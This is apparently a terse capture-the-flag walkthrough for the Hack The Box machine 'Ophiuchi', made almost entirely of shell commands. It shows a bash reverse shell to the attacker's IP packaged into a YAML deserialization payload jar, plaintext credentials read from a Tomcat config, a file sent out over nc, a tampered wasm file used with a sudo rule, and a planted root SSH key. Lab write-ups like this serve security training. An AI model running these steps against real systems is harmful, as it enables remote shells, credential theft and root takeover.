http://10.10.10.227:8080/

┌──(root💀kali)-[/home/kali/Downloads]

└─# echo "10.10.10.227 ophiuchi.htb" >> /etc/hosts

┌──(root💀kali)-[/home/kali/Downloads]

└─# git clone https://github.com/artsploit/yaml-payload

┌──(root💀kali)-[/home/kali/Downloads/yaml-payload]

└─# cat rev.sh          

#!/bin/sh

bash -i >& /dev/tcp/10.10.14.16/8888 0>&1

┌──(root💀kali)-[/home/kali/Downloads/yaml-payload/src]

└─# gedit artsploit/AwesomeScriptEngineFactory.java

root@osboxes:~/Downloads/yaml-payload# javac src/artsploit/AwesomeScriptEngineFactory.java

root@osboxes:~/Downloads/yaml-payload# jar -cvf yaml-payload.jar -C src/ .

Now we go to the browser.

tomcat@ophiuchi:/$ cd /opt

tomcat@ophiuchi:/opt$ ls -lrt

tomcat@ophiuchi:/opt$ cd tomcat

tomcat@ophiuchi:~$ ls -lrt

tomcat@ophiuchi:~$ cd conf

tomcat@ophiuchi:~/conf$ ls -lrt

tomcat@ophiuchi:~/conf$ cat tomcat-users.xml

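So here are the credentials, stored in plaintext in tomcat-users.xml and readable by the tomcat service account; the same username is then used for the SSH login below: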

Username: admin

Password: whythereisalimit

root@osboxes:~/Downloads/yaml-payload# ssh admin@10.10.10.227

admin@ophiuchi:~$ sudo -l

admin@ophiuchi:~$ cat /opt/wasm-functions/index.go

admin@ophiuchi:~$ cd /tmp

admin@ophiuchi:/tmp$ mkdir work && cd work

admin@ophiuchi:/tmp/work$ cp /opt/wasm-functions/main.wasm ./

admin@ophiuchi:/tmp/work$ sudo /usr/bin/go run /opt/wasm-functions/index.go

root@osboxes:~/Downloads/yaml-payload# nc -lvnp 1234 > main.wasm

admin@ophiuchi:/tmp/work$ cat main.wasm | nc 10.10.14.16 1234

https://webassembly.github.io/wabt/demo/wasm2wat/index.html

https://webassembly.github.io/wabt/demo/wat2wasm/index.html

root@osboxes:~/Downloads# cp test.wasm main.wasm

root@osboxes:~/Downloads# scp main.wasm admin@ophiuchi.htb:/tmp/work

root@osboxes:~/Downloads# ssh-keygen

echo “ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDvqChvcSz6rYFdxAqmgvFzTF5f6XYM05Gg21FzfiuU7MyUNj4Ak2FyxbtKZv01YoD91EetadIbhc/6pRS7Bu37j8lxsV1NjdaKewvsw0JCHfzqqghdYeNC0zHLZBrlfdb6AGGUMgYc3zTK/7mSc2X5vwRtcIMKYgwBB7x5JWH/b2t0SbVSpQRzPYpE4RwA/coPsbzY1BIJjuLk/Pv39M04WiDbG3nKVMmP+RyozKPwzp2C2FMjBXCfj7lPe/0NHb2Qr1F5XCwHoEzAVE0uGXvjyLtyKMJlMbagJO63NG5WCFUonwfF7UpOeZR43VdxzG2lT4XfwxawOMMcJPJAoluF root@osboxes” > /root/.ssh/authorized_keys

admin@ophiuchi:/tmp/work$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go

Hi, I’m saksham dixit
